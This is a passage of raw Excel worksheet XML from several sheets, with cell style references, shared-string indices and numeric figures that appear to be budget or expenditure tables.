      <c r="H5" s="343" t="s">
        <v>939</v>
      </c>
    </row>
    <row r="6" ht="39.95" customHeight="1" spans="1:5">
      <c r="A6" s="344" t="s">
        <v>636</v>
      </c>
      <c r="B6" s="345">
        <v>1619</v>
      </c>
      <c r="C6" s="336"/>
      <c r="D6" s="336"/>
      <c r="E6" s="336"/>
    </row>
    <row r="7" ht="39.95" customHeight="1" spans="1:5">
      <c r="A7" s="344" t="s">
        <v>637</v>
      </c>
      <c r="B7" s="345">
        <v>80983</v>
      </c>
      <c r="C7" s="336"/>
      <c r="D7" s="336"/>
      <c r="E7" s="336"/>
    </row>
    <row r="8" spans="1:5">
      <c r="A8" s="336"/>
      <c r="B8" s="346"/>
      <c r="C8" s="336"/>
      <c r="D8" s="336"/>
      <c r="E8" s="336"/>
    </row>
    <row r="9" spans="1:5">
      <c r="A9" s="336"/>
      <c r="B9" s="346"/>
      <c r="C9" s="336"/>
      <c r="D9" s="336"/>
      <c r="E9" s="336"/>
    </row>
    <row r="10" spans="1:5">
      <c r="A10" s="336"/>
      <c r="B10" s="346"/>
      <c r="C10" s="336"/>
      <c r="D10" s="336"/>
      <c r="E10" s="336"/>
    </row>
    <row r="11" spans="1:5">
      <c r="A11" s="336"/>
      <c r="B11" s="346"/>
      <c r="C11" s="336"/>
      <c r="D11" s="336"/>
      <c r="E11" s="336"/>
    </row>
    <row r="12" spans="1:5">
      <c r="A12" s="336"/>
      <c r="B12" s="346"/>
      <c r="C12" s="336"/>
      <c r="D12" s="336"/>
      <c r="E12" s="336"/>
    </row>
    <row r="13" spans="1:5">
      <c r="A13" s="336"/>
      <c r="B13" s="346"/>
      <c r="C13" s="336"/>
      <c r="D13" s="336"/>
      <c r="E13" s="336"/>
    </row>
    <row r="14" spans="1:5">
      <c r="A14" s="336"/>
      <c r="B14" s="346"/>
      <c r="C14" s="336"/>
      <c r="D14" s="336"/>
      <c r="E14" s="336"/>
    </row>
    <row r="15" spans="1:5">
      <c r="A15" s="336"/>
      <c r="B15" s="346"/>
      <c r="C15" s="336"/>
      <c r="D15" s="336"/>
      <c r="E15" s="336"/>
    </row>
    <row r="16" spans="1:5">
      <c r="A16" s="336"/>
      <c r="B16" s="346"/>
      <c r="C16" s="336"/>
      <c r="D16" s="336"/>
      <c r="E16" s="336"/>
    </row>
    <row r="17" spans="1:5">
      <c r="A17" s="336"/>
      <c r="B17" s="346"/>
      <c r="C17" s="336"/>
      <c r="D17" s="336"/>
      <c r="E17" s="336"/>
    </row>
    <row r="18" spans="1:5">
      <c r="A18" s="336"/>
      <c r="B18" s="346"/>
      <c r="C18" s="336"/>
      <c r="D18" s="336"/>
      <c r="E18" s="336"/>
    </row>
    <row r="19" spans="1:5">
      <c r="A19" s="336"/>
      <c r="B19" s="346"/>
      <c r="C19" s="336"/>
      <c r="D19" s="336"/>
      <c r="E19" s="336"/>
    </row>
    <row r="20" spans="1:5">
      <c r="A20" s="336"/>
      <c r="B20" s="346"/>
      <c r="C20" s="336"/>
      <c r="D20" s="336"/>
      <c r="E20" s="336"/>
    </row>
    <row r="21" spans="1:5">
      <c r="A21" s="336"/>
      <c r="B21" s="346"/>
      <c r="C21" s="336"/>
      <c r="D21" s="336"/>
      <c r="E21" s="336"/>
    </row>
    <row r="22" spans="1:5">
      <c r="A22" s="336"/>
      <c r="B22" s="346"/>
      <c r="C22" s="336"/>
      <c r="D22" s="336"/>
      <c r="E22" s="336"/>
    </row>
    <row r="23" spans="1:5">
      <c r="A23" s="336"/>
      <c r="B23" s="346"/>
      <c r="C23" s="336"/>
      <c r="D23" s="336"/>
      <c r="E23" s="336"/>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="346"/>
    </row>
    <row r="25" spans="1:5">
      <c r="A25" s="336"/>
      <c r="B25" s="346"/>
      <c r="C25" s="336"/>
      <c r="D25" s="336"/>
      <c r="E25" s="336"/>
    </row>
    <row r="26" spans="1:5">
      <c r="A26" s="336"/>
      <c r="B26" s="346"/>
      <c r="C26" s="336"/>
      <c r="D26" s="336"/>
      <c r="E26" s="336"/>
    </row>
    <row r="27" spans="1:5">
      <c r="A27" s="336"/>
      <c r="B27" s="346"/>
      <c r="C27" s="336"/>
      <c r="D27" s="336"/>
      <c r="E27" s="336"/>
    </row>
    <row r="28" spans="1:5">
      <c r="A28" s="336"/>
      <c r="B28" s="346"/>
      <c r="C28" s="336"/>
      <c r="D28" s="336"/>
      <c r="E28" s="336"/>
    </row>
    <row r="29" spans="1:5">
      <c r="A29" s="336"/>
      <c r="B29" s="346"/>
      <c r="C29" s="336"/>
      <c r="D29" s="336"/>
      <c r="E29" s="336"/>
    </row>
    <row r="30" spans="1:5">
      <c r="A30" s="336"/>
      <c r="B30" s="346"/>
      <c r="C30" s="336"/>
      <c r="D30" s="336"/>
      <c r="E30" s="336"/>
    </row>
    <row r="31" spans="1:5">
      <c r="A31" s="336"/>
      <c r="B31" s="346"/>
      <c r="C31" s="336"/>
      <c r="D31" s="336"/>
      <c r="E31" s="336"/>
    </row>
    <row r="32" spans="1:5">
      <c r="A32" s="336"/>
      <c r="B32" s="346"/>
      <c r="C32" s="336"/>
      <c r="D32" s="336"/>
      <c r="E32" s="336"/>
    </row>
    <row r="33" spans="2:2">
      <c r="B33" s="346"/>
    </row>
    <row r="34" spans="2:2">
      <c r="B34" s="346"/>
    </row>
    <row r="35" spans="2:2">
      <c r="B35" s="346"/>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="346"/>
    </row>
    <row r="37" spans="2:2">
      <c r="B37" s="346"/>
    </row>
    <row r="38" spans="2:2">
      <c r="B38" s="346"/>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="346"/>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="346"/>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="346"/>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="346"/>
    </row>
    <row r="43" spans="2:2">
      <c r="B43" s="346"/>
    </row>
    <row r="44" spans="2:2">
      <c r="B44" s="346"/>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="346"/>
    </row>
    <row r="46" spans="2:2">
      <c r="B46" s="346"/>
    </row>
    <row r="47" spans="2:2">
      <c r="B47" s="346"/>
    </row>
    <row r="48" spans="2:2">
      <c r="B48" s="346"/>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="346"/>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="346"/>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="346"/>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="346"/>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="346"/>
    </row>
    <row r="54" spans="2:2">
      <c r="B54" s="346"/>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="346"/>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="346"/>
    </row>
    <row r="57" spans="2:2">
      <c r="B57" s="346"/>
    </row>
    <row r="58" spans="2:2">
      <c r="B58" s="346"/>
    </row>
    <row r="59" spans="2:2">
      <c r="B59" s="346"/>
    </row>
    <row r="60" spans="2:2">
      <c r="B60" s="346"/>
    </row>
    <row r="61" spans="2:2">
      <c r="B61" s="346"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:B2"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E6" sqref="E6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="89.7222222222222" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="57" customHeight="1"/>
    <row r="2" ht="57" customHeight="1"/>
    <row r="3" ht="148.8" spans="1:1">
      <c r="A3" s="78" t="s">
        <v>2187</v>
      </c>
    </row>
    <row r="4" ht="57" customHeight="1"/>
    <row r="5" ht="57" customHeight="1"/>
    <row r="6" ht="57" customHeight="1"/>
    <row r="7" ht="57" customHeight="1"/>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:K35"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="115" zoomScaleNormal="100" zoomScaleSheetLayoutView="115" workbookViewId="0">
      <pane xSplit="2" ySplit="4" topLeftCell="C5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="K21" sqref="K21"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="11.8425925925926" style="184" customWidth="1"/>
    <col min="2" max="5" width="17.2777777777778" style="184" customWidth="1"/>
    <col min="6" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:5">
      <c r="A1" s="186" t="s">
        <v>2188</v>
      </c>
      <c r="B1" s="218"/>
      <c r="C1" s="218"/>
      <c r="D1" s="218"/>
      <c r="E1" s="330"/>
    </row>
    <row r="2" ht="28.15" customHeight="1" spans="1:5">
      <c r="A2" s="301" t="s">
        <v>2189</v>
      </c>
      <c r="B2" s="301"/>
      <c r="C2" s="301"/>
      <c r="D2" s="301"/>
      <c r="E2" s="301"/>
    </row>
    <row r="3" ht="21" customHeight="1" spans="1:5">
      <c r="A3" s="220"/>
      <c r="B3" s="220"/>
      <c r="C3" s="220"/>
      <c r="D3" s="220"/>
      <c r="E3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="38.1" customHeight="1" spans="1:5">
      <c r="A4" s="305" t="s">
        <v>812</v>
      </c>
      <c r="B4" s="305" t="s">
        <v>2190</v>
      </c>
      <c r="C4" s="305" t="s">
        <v>2191</v>
      </c>
      <c r="D4" s="305" t="s">
        <v>2192</v>
      </c>
      <c r="E4" s="305" t="s">
        <v>2193</v>
      </c>
    </row>
    <row r="5" ht="30.4" customHeight="1" spans="1:11">
      <c r="A5" s="310" t="s">
        <v>2194</v>
      </c>
      <c r="B5" s="324">
        <v>928139</v>
      </c>
      <c r="C5" s="324">
        <v>137500</v>
      </c>
      <c r="D5" s="311">
        <v>1195665.84</v>
      </c>
      <c r="E5" s="311">
        <v>1129050</v>
      </c>
      <c r="I5" s="227"/>
      <c r="J5" s="227"/>
      <c r="K5" s="227"/>
    </row>
    <row r="6" ht="30.4" customHeight="1" spans="1:11">
      <c r="A6" s="312" t="s">
        <v>2195</v>
      </c>
      <c r="B6" s="325">
        <v>928139</v>
      </c>
      <c r="C6" s="325">
        <v>137500</v>
      </c>
      <c r="D6" s="313">
        <v>1195665.84</v>
      </c>
      <c r="E6" s="313">
        <v>1129050</v>
      </c>
      <c r="I6" s="227"/>
      <c r="J6" s="227"/>
      <c r="K6" s="227"/>
    </row>
    <row r="7" ht="30.4" customHeight="1" spans="1:11">
      <c r="A7" s="331"/>
      <c r="B7" s="331"/>
      <c r="C7" s="331"/>
      <c r="D7" s="331"/>
      <c r="E7" s="332"/>
      <c r="I7" s="227"/>
      <c r="J7" s="227"/>
      <c r="K7" s="227"/>
    </row>
    <row r="8" ht="30.4" customHeight="1" spans="1:11">
      <c r="A8" s="331"/>
      <c r="B8" s="331"/>
      <c r="C8" s="331"/>
      <c r="D8" s="331"/>
      <c r="E8" s="332"/>
      <c r="I8" s="227"/>
      <c r="J8" s="227"/>
      <c r="K8" s="227"/>
    </row>
    <row r="9" ht="30.4" customHeight="1" spans="1:11">
      <c r="A9" s="331"/>
      <c r="B9" s="331"/>
      <c r="C9" s="331"/>
      <c r="D9" s="331"/>
      <c r="E9" s="332"/>
      <c r="I9" s="227"/>
      <c r="J9" s="227"/>
      <c r="K9" s="227"/>
    </row>
    <row r="10" ht="30.4" customHeight="1" spans="1:11">
      <c r="A10" s="331"/>
      <c r="B10" s="331"/>
      <c r="C10" s="331"/>
      <c r="D10" s="331"/>
      <c r="E10" s="332"/>
      <c r="I10" s="227"/>
      <c r="J10" s="227"/>
      <c r="K10" s="227"/>
    </row>
    <row r="11" ht="30.4" customHeight="1" spans="1:11">
      <c r="A11" s="331"/>
      <c r="B11" s="331"/>
      <c r="C11" s="331"/>
      <c r="D11" s="331"/>
      <c r="E11" s="332"/>
      <c r="I11" s="227"/>
      <c r="J11" s="227"/>
      <c r="K11" s="227"/>
    </row>
    <row r="12" ht="30.4" customHeight="1" spans="1:11">
      <c r="A12" s="331"/>
      <c r="B12" s="331"/>
      <c r="C12" s="331"/>
      <c r="D12" s="331"/>
      <c r="E12" s="332"/>
      <c r="I12" s="227"/>
      <c r="J12" s="227"/>
      <c r="K12" s="227"/>
    </row>
    <row r="13" ht="20.65" customHeight="1" spans="1:5">
      <c r="A13" s="330"/>
      <c r="B13" s="330"/>
      <c r="C13" s="330"/>
      <c r="D13" s="330"/>
      <c r="E13" s="330"/>
    </row>
    <row r="14" ht="14.4" spans="1:5">
      <c r="A14" s="331"/>
      <c r="B14" s="331"/>
      <c r="C14" s="331"/>
      <c r="D14" s="331"/>
      <c r="E14" s="331"/>
    </row>
    <row r="15" ht="14.4" spans="1:5">
      <c r="A15" s="333"/>
      <c r="B15" s="333"/>
      <c r="C15" s="333"/>
      <c r="D15" s="333"/>
      <c r="E15" s="333"/>
    </row>
    <row r="16" ht="14.4" spans="1:5">
      <c r="A16" s="333"/>
      <c r="B16" s="333"/>
      <c r="C16" s="333"/>
      <c r="D16" s="333"/>
      <c r="E16" s="333"/>
    </row>
    <row r="17" ht="14.4" spans="1:5">
      <c r="A17" s="333"/>
      <c r="B17" s="333"/>
      <c r="C17" s="333"/>
      <c r="D17" s="333"/>
      <c r="E17" s="333"/>
    </row>
    <row r="18" ht="14.4" spans="1:5">
      <c r="A18" s="331"/>
      <c r="B18" s="331"/>
      <c r="C18" s="331"/>
      <c r="D18" s="331"/>
      <c r="E18" s="331"/>
    </row>
    <row r="19" ht="14.4" spans="1:5">
      <c r="A19" s="331"/>
      <c r="B19" s="331"/>
      <c r="C19" s="331"/>
      <c r="D19" s="331"/>
      <c r="E19" s="331"/>
    </row>
    <row r="20" ht="14.4" spans="1:5">
      <c r="A20" s="331"/>
      <c r="B20" s="331"/>
      <c r="C20" s="331"/>
      <c r="D20" s="331"/>
      <c r="E20" s="331"/>
    </row>
    <row r="21" ht="14.4" spans="1:5">
      <c r="A21" s="331"/>
      <c r="B21" s="331"/>
      <c r="C21" s="331"/>
      <c r="D21" s="331"/>
      <c r="E21" s="331"/>
    </row>
    <row r="22" ht="14.4" spans="1:5">
      <c r="A22" s="331"/>
      <c r="B22" s="331"/>
      <c r="C22" s="331"/>
      <c r="D22" s="331"/>
      <c r="E22" s="331"/>
    </row>
    <row r="23" ht="14.4" spans="1:5">
      <c r="A23" s="331"/>
      <c r="B23" s="331"/>
      <c r="C23" s="331"/>
      <c r="D23" s="331"/>
      <c r="E23" s="331"/>
    </row>
    <row r="24" ht="14.4" spans="1:5">
      <c r="A24" s="331"/>
      <c r="B24" s="331"/>
      <c r="C24" s="331"/>
      <c r="D24" s="331"/>
      <c r="E24" s="331"/>
    </row>
    <row r="25" ht="14.4" spans="1:5">
      <c r="A25" s="331"/>
      <c r="B25" s="331"/>
      <c r="C25" s="331"/>
      <c r="D25" s="331"/>
      <c r="E25" s="331"/>
    </row>
    <row r="26" ht="14.4" spans="1:5">
      <c r="A26" s="331"/>
      <c r="B26" s="331"/>
      <c r="C26" s="331"/>
      <c r="D26" s="331"/>
      <c r="E26" s="331"/>
    </row>
    <row r="27" ht="14.4" spans="1:5">
      <c r="A27" s="331"/>
      <c r="B27" s="331"/>
      <c r="C27" s="331"/>
      <c r="D27" s="331"/>
      <c r="E27" s="331"/>
    </row>
    <row r="28" ht="14.4" spans="1:5">
      <c r="A28" s="331"/>
      <c r="B28" s="331"/>
      <c r="C28" s="331"/>
      <c r="D28" s="331"/>
      <c r="E28" s="331"/>
    </row>
    <row r="29" ht="14.4" spans="1:5">
      <c r="A29" s="331"/>
      <c r="B29" s="331"/>
      <c r="C29" s="331"/>
      <c r="D29" s="331"/>
      <c r="E29" s="331"/>
    </row>
    <row r="30" ht="14.4" spans="1:5">
      <c r="A30" s="331"/>
      <c r="B30" s="331"/>
      <c r="C30" s="331"/>
      <c r="D30" s="331"/>
      <c r="E30" s="331"/>
    </row>
    <row r="31" ht="14.4" spans="1:5">
      <c r="A31" s="331"/>
      <c r="B31" s="331"/>
      <c r="C31" s="331"/>
      <c r="D31" s="331"/>
      <c r="E31" s="331"/>
    </row>
    <row r="32" ht="14.4" spans="1:5">
      <c r="A32" s="331"/>
      <c r="B32" s="331"/>
      <c r="C32" s="331"/>
      <c r="D32" s="331"/>
      <c r="E32" s="331"/>
    </row>
    <row r="33" ht="14.4" spans="1:5">
      <c r="A33" s="331"/>
      <c r="B33" s="331"/>
      <c r="C33" s="331"/>
      <c r="D33" s="331"/>
      <c r="E33" s="331"/>
    </row>
    <row r="34" ht="14.4" spans="1:5">
      <c r="A34" s="331"/>
      <c r="B34" s="331"/>
      <c r="C34" s="331"/>
      <c r="D34" s="331"/>
      <c r="E34" s="331"/>
    </row>
    <row r="35" ht="14.4" spans="1:5">
      <c r="A35" s="331"/>
      <c r="B35" s="331"/>
      <c r="C35" s="331"/>
      <c r="D35" s="331"/>
      <c r="E35" s="331"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="A13:E13"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:L14"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A23" sqref="A23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="81.4259259259259" style="184" customWidth="1"/>
    <col min="2" max="2" width="34.4259259259259" style="184" customWidth="1"/>
    <col min="3" max="253" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" s="184" customFormat="1" ht="18" customHeight="1" spans="1:2">
      <c r="A1" s="186" t="s">
        <v>2196</v>
      </c>
      <c r="B1" s="318"/>
    </row>
    <row r="2" s="184" customFormat="1" ht="28.15" customHeight="1" spans="1:2">
      <c r="A2" s="301" t="s">
        <v>2197</v>
      </c>
      <c r="B2" s="301"/>
    </row>
    <row r="3" s="184" customFormat="1" ht="32.65" customHeight="1" spans="1:2">
      <c r="A3" s="302"/>
      <c r="B3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="184" customFormat="1" ht="53.65" customHeight="1" spans="1:2">
      <c r="A4" s="305" t="s">
        <v>2198</v>
      </c>
      <c r="B4" s="305" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="5" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A5" s="326" t="s">
        <v>2199</v>
      </c>
      <c r="B5" s="327">
        <v>144049</v>
      </c>
      <c r="D5" s="316"/>
      <c r="E5" s="316"/>
      <c r="F5" s="316"/>
      <c r="G5" s="316"/>
      <c r="I5" s="316"/>
      <c r="J5" s="316"/>
      <c r="K5" s="316"/>
      <c r="L5" s="316"/>
    </row>
    <row r="6" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A6" s="326" t="s">
        <v>2200</v>
      </c>
      <c r="B6" s="327">
        <v>148115.84</v>
      </c>
      <c r="D6" s="316"/>
      <c r="E6" s="316"/>
      <c r="F6" s="316"/>
      <c r="G6" s="316"/>
      <c r="I6" s="316"/>
      <c r="J6" s="316"/>
      <c r="K6" s="316"/>
      <c r="L6" s="316"/>
    </row>
    <row r="7" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A7" s="326" t="s">
        <v>2201</v>
      </c>
      <c r="B7" s="327">
        <v>7140</v>
      </c>
      <c r="D7" s="316"/>
      <c r="E7" s="316"/>
      <c r="F7" s="316"/>
      <c r="G7" s="316"/>
      <c r="I7" s="316"/>
      <c r="J7" s="316"/>
      <c r="K7" s="316"/>
      <c r="L7" s="316"/>
    </row>
    <row r="8" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A8" s="326" t="s">
        <v>2202</v>
      </c>
      <c r="B8" s="327">
        <v>0</v>
      </c>
      <c r="D8" s="316"/>
      <c r="E8" s="316"/>
      <c r="F8" s="316"/>
      <c r="G8" s="316"/>
      <c r="I8" s="316"/>
      <c r="J8" s="316"/>
      <c r="K8" s="316"/>
      <c r="L8" s="316"/>
    </row>
    <row r="9" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A9" s="326" t="s">
        <v>2203</v>
      </c>
      <c r="B9" s="327">
        <v>7140</v>
      </c>
      <c r="D9" s="316"/>
      <c r="E9" s="316"/>
      <c r="F9" s="316"/>
      <c r="G9" s="316"/>
      <c r="I9" s="316"/>
      <c r="J9" s="316"/>
      <c r="K9" s="316"/>
      <c r="L9" s="316"/>
    </row>
    <row r="10" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A10" s="326" t="s">
        <v>2204</v>
      </c>
      <c r="B10" s="327">
        <v>5729</v>
      </c>
      <c r="D10" s="316"/>
      <c r="E10" s="316"/>
      <c r="F10" s="316"/>
      <c r="G10" s="316"/>
      <c r="I10" s="316"/>
      <c r="J10" s="316"/>
      <c r="K10" s="316"/>
      <c r="L10" s="316"/>
    </row>
    <row r="11" s="184" customFormat="1" ht="30.4" customHeight="1" spans="1:12">
      <c r="A11" s="326" t="s">
        <v>2205</v>
      </c>
      <c r="B11" s="327">
        <v>145460</v>
      </c>
      <c r="D11" s="316"/>
      <c r="E11" s="316"/>
      <c r="F11" s="316"/>
      <c r="G11" s="316"/>
      <c r="I11" s="316"/>
      <c r="J11" s="316"/>
      <c r="K11" s="316"/>
      <c r="L11" s="316"/>
    </row>
    <row r="12" ht="13.2" spans="1:2">
      <c r="A12" s="328" t="s">
        <v>2206</v>
      </c>
      <c r="B12" s="328"/>
    </row>
    <row r="13" ht="30" customHeight="1" spans="1:2">
      <c r="A13" s="329" t="s">
        <v>2207</v>
      </c>
      <c r="B13" s="329"/>
    </row>
    <row r="14" ht="13.2" spans="1:2">
      <c r="A14" s="328" t="s">
        <v>2208</v>
      </c>
      <c r="B14" s="328"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A13:B13"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="landscape"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:O7"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="115" zoomScaleNormal="100" zoomScaleSheetLayoutView="115" workbookViewId="0">
      <pane xSplit="2" ySplit="4" topLeftCell="C5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="I13" sqref="I13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="17.2777777777778" style="184" customWidth="1"/>
    <col min="2" max="5" width="16.7222222222222" style="184" customWidth="1"/>
    <col min="6" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:5">
      <c r="A1" s="186" t="s">
        <v>2209</v>
      </c>
      <c r="B1" s="317"/>
      <c r="C1" s="317"/>
      <c r="D1" s="318"/>
      <c r="E1" s="318"/>
    </row>
    <row r="2" ht="28.15" customHeight="1" spans="1:5">
      <c r="A2" s="301" t="s">
        <v>2210</v>
      </c>
      <c r="B2" s="301"/>
      <c r="C2" s="301"/>
      <c r="D2" s="301"/>
      <c r="E2" s="301"/>
    </row>
    <row r="3" ht="32.65" customHeight="1" spans="1:5">
      <c r="A3" s="302"/>
      <c r="B3" s="302"/>
      <c r="C3" s="302"/>
      <c r="D3" s="302"/>
      <c r="E3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="53.65" customHeight="1" spans="1:5">
      <c r="A4" s="305" t="s">
        <v>812</v>
      </c>
      <c r="B4" s="305" t="s">
        <v>2211</v>
      </c>
      <c r="C4" s="305" t="s">
        <v>2212</v>
      </c>
      <c r="D4" s="305" t="s">
        <v>2213</v>
      </c>
      <c r="E4" s="305" t="s">
        <v>2214</v>
      </c>
    </row>
    <row r="5" ht="30.4" customHeight="1" spans="1:15">
      <c r="A5" s="312" t="s">
        <v>2194</v>
      </c>
      <c r="B5" s="324">
        <v>144049</v>
      </c>
      <c r="C5" s="324">
        <v>0</v>
      </c>
      <c r="D5" s="319">
        <v>148115.84</v>
      </c>
      <c r="E5" s="319">
        <v>145460</v>
      </c>
      <c r="G5" s="316"/>
      <c r="H5" s="316"/>
      <c r="I5" s="316"/>
      <c r="J5" s="316"/>
      <c r="L5" s="316"/>
      <c r="M5" s="316"/>
      <c r="N5" s="316"/>
      <c r="O5" s="316"/>
    </row>
    <row r="6" ht="30.4" customHeight="1" spans="1:15">
      <c r="A6" s="312" t="s">
        <v>2195</v>
      </c>
      <c r="B6" s="325">
        <v>144049</v>
      </c>
      <c r="C6" s="325">
        <v>0</v>
      </c>
      <c r="D6" s="320">
        <v>148115.84</v>
      </c>
      <c r="E6" s="320">
        <v>145460</v>
      </c>
      <c r="G6" s="316"/>
      <c r="H6" s="316"/>
      <c r="I6" s="316"/>
      <c r="J6" s="316"/>
      <c r="L6" s="316"/>
      <c r="M6" s="316"/>
      <c r="N6" s="316"/>
      <c r="O6" s="316"/>
    </row>
    <row r="7" ht="14.4" spans="1:5">
      <c r="A7" s="321"/>
      <c r="B7" s="321"/>
      <c r="C7" s="321"/>
      <c r="D7" s="321"/>
      <c r="E7" s="321"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:E2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.511805555555556" footer="0.511805555555556"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:B9"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane xSplit="1" ySplit="5" topLeftCell="B6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="A15" sqref="A15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.2" outlineLevelCol="1"/>
  <cols>
    <col min="1" max="1" width="83.1481481481482" style="238" customWidth="1"/>
    <col min="2" max="2" width="29.4259259259259" style="238" customWidth="1"/>
    <col min="3" max="16384" width="9" style="238"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:1">
      <c r="A1" s="186" t="s">
        <v>2215</v>
      </c>
    </row>
    <row r="2" ht="32.1" customHeight="1" spans="1:2">
      <c r="A2" s="294" t="s">
        <v>2216</v>
      </c>
      <c r="B2" s="294"/>
    </row>
    <row r="3" ht="24" customHeight="1" spans="1:2">
      <c r="A3" s="262"/>
      <c r="B3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="50.1" customHeight="1" spans="1:2">
      <c r="A4" s="322" t="s">
        <v>2198</v>
      </c>
      <c r="B4" s="322" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="5" ht="50.1" customHeight="1" spans="1:2">
      <c r="A5" s="323" t="s">
        <v>2217</v>
      </c>
      <c r="B5" s="252">
        <v>784090</v>
      </c>
    </row>
    <row r="6" ht="50.1" customHeight="1" spans="1:2">
      <c r="A6" s="323" t="s">
        <v>2218</v>
      </c>
      <c r="B6" s="252">
        <v>1047550</v>
      </c>
    </row>
    <row r="7" ht="50.1" customHeight="1" spans="1:2">
      <c r="A7" s="323" t="s">
        <v>2219</v>
      </c>
      <c r="B7" s="252">
        <v>199500</v>
      </c>
    </row>
    <row r="8" ht="50.1" customHeight="1" spans="1:2">
      <c r="A8" s="323" t="s">
        <v>2220</v>
      </c>
      <c r="B8" s="252">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="50.1" customHeight="1" spans="1:2">
      <c r="A9" s="323" t="s">
        <v>2221</v>
      </c>
      <c r="B9" s="252">
        <v>983590</v>
      </c>
    </row>
  </sheetData>
  <printOptions horizontalCentered="1"/>
